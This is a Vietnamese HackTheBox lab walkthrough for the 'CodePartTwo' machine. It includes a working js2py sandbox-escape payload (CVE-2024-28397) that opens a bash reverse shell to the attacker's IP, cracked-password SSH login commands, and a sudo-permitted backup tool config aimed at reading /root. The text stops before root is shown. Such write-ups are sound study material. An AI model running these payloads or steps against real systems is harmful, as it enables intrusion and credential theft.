HTB-CodePartTwo

# HTB-CodePartTwo ![image](https://hackmd.io/_uploads/Skgsd3g4Ze.png) ## Nmap ![Pasted image 20251209111640](https://hackmd.io/_uploads/HkL3uhxNZe.png) Kết quả: Port `22` và `8000` Truy cập vào web ta có kết quả như sau: ![Pasted image 20251209111944](https://hackmd.io/_uploads/Hyoau3eEbe.png) Ấn vào `Download` app ta sẽ tải về một file Zip, giải nén ta thấy được một file trong đó lưu dưới định dạng `python`. ![Pasted image 20251209112633](https://hackmd.io/_uploads/SyMJK2e4bl.png) Có lẽ sẽ dùng đến, tạm thời bỏ qua, tìm những thứ khác. ![Pasted image 20251209113527](https://hackmd.io/_uploads/SyyxKhxVbe.png) Có vẻ như thấy một cái gì đó rất quan trọng: ``` app.secret_key = 'S3cr3tK3yC0d3PartTw0' app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///users.db' ``` ![Pasted image 20251209113910](https://hackmd.io/_uploads/SkQ-KneV-g.png) Đọc thử file ta thấy được các phiên bản được sử dụng ở đây Sau khi tìm kiếm có thể thấy `js2py 0.74` có **CVE-2024-28397** Quay lại tạo tài khoản và login vào trang web ta sẽ thấy giao diện như sau: ![Pasted image 20251209114147](https://hackmd.io/_uploads/HkCGY2gVZe.png) Từ phần tìm kiếm code để khai thác **CVE-2024-28397** cho reverse shell bằng python, thực hiện sửa code và thay bằng IP của máy đang tấn công. ```python var cmd = "bash -c 'bash -i >& /dev/tcp/10.10.14.6/4446 0>&1'"; var hacked, bymarve, n11; var getattr, obj; hacked = Object.getOwnPropertyNames({}); bymarve = hacked.__getattribute__; n11 = bymarve("__getattribute__"); obj = n11("__class__").__base__; getattr = obj.__getattribute__; function findpopen(o) { var result; var subs = o.__subclasses__(); for (var i = 0; i < subs.length; i++) { var item = subs[i]; if (item.__module__ == "subprocess" && item.__name__ == "Popen") { return item; } if (item.__name__ != "type" && (result = findpopen(item))) { return result; } } } var popen = findpopen(obj); var out = popen(cmd, -1, null, -1, -1, -1, null, null, true).communicate(); console.log(out); out; ``` Chạy một tiến trình lắng nghe trên máy cá nhân và run code trên web: ![Pasted image 20251209135935](https://hackmd.io/_uploads/rJP8Fhl4Zx.png) Ta đã lấy được Reverse shell, thực hiện khai thác người dùng và nhiều thông tin khác. Phát hiện người dùng tên là `Marco`. ![Pasted image 20251209140849](https://hackmd.io/_uploads/r1avFhgNbx.png) Phát hiện người dùng tên là Marco ![Pasted image 20251209141831](https://hackmd.io/_uploads/HkquF2e4bx.png) Tôi muốn kiểm tra cơ sở dữ liệu, thử với `Sqlite3`, ta thấy được người dùng `Marco` và một mã băm `MD5` Bẻ khỏa mật khẩu bằng bất cứ cách nào: **sweetangelbabylove** ```shell python3 -c 'import pty,sys; pty.spawn("/bin/bash"); exec("""\nssh marco@127.0.0.1 -o PreferredAuthentications=password -o PubkeyAuthentication=no -o StrictHostKeyChecking=no sweetangelbabylove""") ``` `printf "sweetangelbabylove\nyes\n" | ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no -o StrictHostKeyChecking=no marco@127.0.0.1` ![Pasted image 20251209151517](https://hackmd.io/_uploads/S1T3Knl4-e.png) Login thành công vào người dùng `marco` ![Pasted image 20251209151906](https://hackmd.io/_uploads/SkVCF2xEZg.png) Thành công lấy được `Flag user` ## Root ![Pasted image 20251209152433](https://hackmd.io/_uploads/B1Seq3xVbx.png) Ta thấy được Misconfig cho phép chạy `npbackup-cli NOPASSWD`, script này backup arbitrary paths bao gồm cả `/root` ```python marco@codeparttwo:~$ cat npbackup.conf cat npbackup.conf conf_version: 3.0.1 audience: public repos: default: repo_uri: __NPBACKUP__wd9051w9Y0p4ZYWmIxMqKHP81/phMlzIOYsL01M9Z7IxNzQzOTEwMDcxLjM5NjQ0Mg8PDw8PDw8PDw8PDw8PD6yVSCEXjl8/9rIqYrh8kIRhlKm4UPcem5kIIFPhSpDU+e+E__NPBACKUP__ repo_group: default_group backup_opts: paths: - /home/app/app/ source_type: folder_list exclude_files_larger_than: 0.0 repo_opts: repo_password: __NPBACKUP__v2zdDN21b0c7TSeUZlwezkPj3n8wlR9Cu1IJSMrSctoxNzQzOTEwMDcxLjM5NjcyNQ8PDw8PDw8PDw8PDw8PD0z8n8DrGuJ3ZVWJwhBl0GHtbaQ8lL3fB0M=__NPBACKUP__ retention_policy: {} prune_max_unused: 0 prometheus: {} env: {} is_protected: false groups: default_group: backup_opts: paths: [] source_type: stdin_from_command: stdin_filename: tags: [] compression: auto use_fs_snapshot: true ignore_cloud_files: true one_file_system: false priority: low exclude_caches: true excludes_case_ignore: false exclude_files: - excludes/generic_excluded_extensions - excludes/generic_excludes - excludes/windows_excludes - excludes/linux_excludes exclude_patterns: [] exclude_files_larger_than: additional_parameters: additional_backup_only_parameters: minimum_backup_size_error: 10 MiB pre_exec_commands: [] pre_exec_per_command_timeout: 3600 pre_exec_failure_is_fatal: false post_exec_commands: [] post_exec_per_command_timeout: 3600 post_exec_failure_is_fatal: false post_exec_execute_even_on_backup_error: true post_backup_housekeeping_percent_chance: 0 post_backup_housekeeping_interval: 0 repo_opts: repo_password: repo_password_command: minimum_backup_age: 1440 upload_speed: 800 Mib download_speed: 0 Mib backend_connections: 0 retention_policy: last: 3 hourly: 72 daily: 30 weekly: 4 monthly: 12 yearly: 3 tags: [] keep_within: true group_by_host: true group_by_tags: true group_by_paths: false ntp_server: prune_max_unused: 0 B prune_max_repack_size: prometheus: backup_job: ${MACHINE_ID} group: ${MACHINE_GROUP} env: env_variables: {} encrypted_env_variables: {} is_protected: false identity: machine_id: ${HOSTNAME}__blw0 machine_group: global_prometheus: metrics: false instance: ${MACHINE_ID} destination: http_username: http_password: additional_labels: {} no_cert_verify: false global_options: auto_upgrade: false auto_upgrade_percent_chance: 5 auto_upgrade_interval: 15 auto_upgrade_server_url: auto_upgrade_server_username: auto_upgrade_server_password: auto_upgrade_host_identity: ${MACHINE_ID} auto_upgrade_group: ${MACHINE_GROUP} ``` ```shell marco@codeparttwo:~$ sudo npbackup-cli -c npbackup.conf -b -f sudo npbackup-cli -c npbackup.conf -b -f 2025-12-09 08:30:27,661 :: INFO :: npbackup 3.0.1-linux-UnknownBuildType-x64-legacy-public-3.8-i 2025032101 - Copyright (C) 2022-2025 NetInvent running as root 2025-12-09 08:30:27,680 :: INFO :: Loaded config 4E3B3BFD in /home/marco/npbackup.conf 2025-12-09 08:30:27,687 :: INFO :: Running backup of ['/home/app/app/'] to repo default 2025-12-09 08:30:28,722 :: INFO :: Trying to expanding exclude file path to /usr/local/bin/excludes/generic_excluded_extensions 2025-12-09 08:30:28,723 :: ERROR :: Exclude file 'excludes/generic_excluded_extensions' not found 2025-12-09 08:30:28,723 :: INFO :: Trying to expanding exclude file path to /usr/local/bin/excludes/generic_excludes 2025-12-09 08:30:28,723 :: ERROR :: Exclude file 'excludes/generic_excludes' not found 2025-12-09 08:30:28,723 :: INFO :: Trying to expanding exclude file path to /usr/local/bin/excludes/windows_excludes 2025-12-09 08:30:28,723 :: ERROR :: Exclude file 'excludes/windows_excludes' not found 2025-12-09 08:30:28,723 :: INFO :: Trying to expanding exclude file path to /usr/local/bin/excludes/linux_excludes 2025-12-09 08:30:28,723 :: ERROR :: Exclude file 'excludes/linux_excludes' not found 2025-12-09 08:30:28,723 :: WARNING :: Parameter --use-fs-snapshot was given, which is only compatible with Windows no parent snapshot found, will read all files Files: 12 new, 0 changed, 0 unmodified Dirs: 9 new, 0 changed, 0 unmodified Added to the repository: 34.053 KiB (19.490 KiB stored) processed 12 files, 48.965 KiB in 0:00 snapshot 7ce730bf saved 2025-12-09 08:30:29,574 :: INFO :: Backend finished with success 2025-12-09 08:30:29,575 :: INFO :: Processed 49.0 KiB of data 2025-12-09 08:30:29,576 :: ERROR :: Backup is smaller than configured minmium backup size 2025-12-09 08:30:29,576 :: ERROR :: Operation finished with failure 2025-12-09 08:30:29,576 :: INFO :: Runner took 1.889526 seconds for backup 2025-12-09 08:30:29,576 :: INFO :: Operation finished 2025-12-09 08:30:29,580 :: INFO :: ExecTime = 0:00:01.921126, finished, state is: errors. ```